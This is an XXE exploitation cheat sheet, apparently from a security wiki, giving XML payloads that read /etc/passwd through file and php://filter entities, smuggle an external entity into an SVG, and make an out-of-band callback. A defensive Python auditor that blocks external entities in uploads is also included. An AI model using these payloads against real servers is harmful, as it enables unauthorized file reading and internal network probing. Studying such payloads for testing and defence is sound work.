How to exploit XML External Entities (XXE). This allows a remote attacker to read files off of the filesystem, make HTTP requests to internal services/applications, and read the responses.
XXE with SVG
Because SVG is XML, an SVG document can also carry an XXE payload:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
<!-- an internal subset can be embedded here -->
<!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<text x="20" y="35">My &xxe;</text>
</svg>
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>
Read file
Let's try to read /etc/passwd in different ways. On Windows you could try to read C:\windows\system32\drivers\etc\hosts instead.
In this first case, notice that SYSTEM "file:///etc/passwd" will also work.
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
This second case is useful for extracting a file when the web server runs PHP (not the case for PortSwigger's labs):
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>
In this third case, notice that the element stockCheck is declared as ANY:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck>
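Every payload above depends on the parser resolving a SYSTEM entity. The following is an added example, not code from the original page: it audits an uploaded XML or SVG document with Python's stdlib expat parser, recording DOCTYPE and entity declarations and refusing to resolve any external reference instead of fetching it. The sample documents are constructed: a copy of the SVG payload above and a benign SVG with the same DOCTYPE.

```python
"""Audit untrusted XML (SVG uploads included) for external entities without resolving them.
Added example, not code from the original page; it uses only the stdlib expat parser."""
import xml.parsers.expat
from dataclasses import dataclass, field

@dataclass
class XmlAudit:
    doctype: str = ""                               # root name from <!DOCTYPE ...>
    external_entities: list = field(default_factory=list)  # (name, system id) pairs
    blocked_refs: int = 0                           # external refs the parser refused
    error: str = ""                                 # expat error that halted parsing

def audit_xml(data: bytes) -> XmlAudit:
    """Parse with handlers that record DTD declarations and veto external fetches."""
    audit = XmlAudit()
    parser = xml.parsers.expat.ParserCreate()
    # Never load the external DTD subset or parameter entities (explicit, not assumed).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def on_doctype(name, sysid, pubid, has_internal_subset):
        audit.doctype = name
    def on_entity(name, is_pe, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:  # SYSTEM/PUBLIC means external
            audit.external_entities.append((name, sysid))
    def on_external_ref(context, base, sysid, pubid):
        audit.blocked_refs += 1
        return 0  # a false return makes expat abort instead of fetching sysid
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        audit.error = str(exc)
    return audit

def is_safe_upload(data: bytes) -> bool:
    """Accept only documents that declare no external entity and parse cleanly."""
    audit = audit_xml(data)
    return not audit.external_entities and not audit.error

# Constructed samples: the SVG payload from above, and a plain SVG with the same DOCTYPE.
SVG_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
<!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="20" y="35">My &xxe;</text></svg>"""
BENIGN_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>"""
```

Running `audit_xml(SVG_PAYLOAD)` reports the `xxe` entity and one blocked reference, while `BENIGN_SVG` parses cleanly despite its DOCTYPE; logging the `external_entities` field gives a detection signal for upload handlers.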
Directory listing
In Java-based applications it might be possible to list the contents of a directory via XXE with a payload like the following (asking for the directory instead of a file):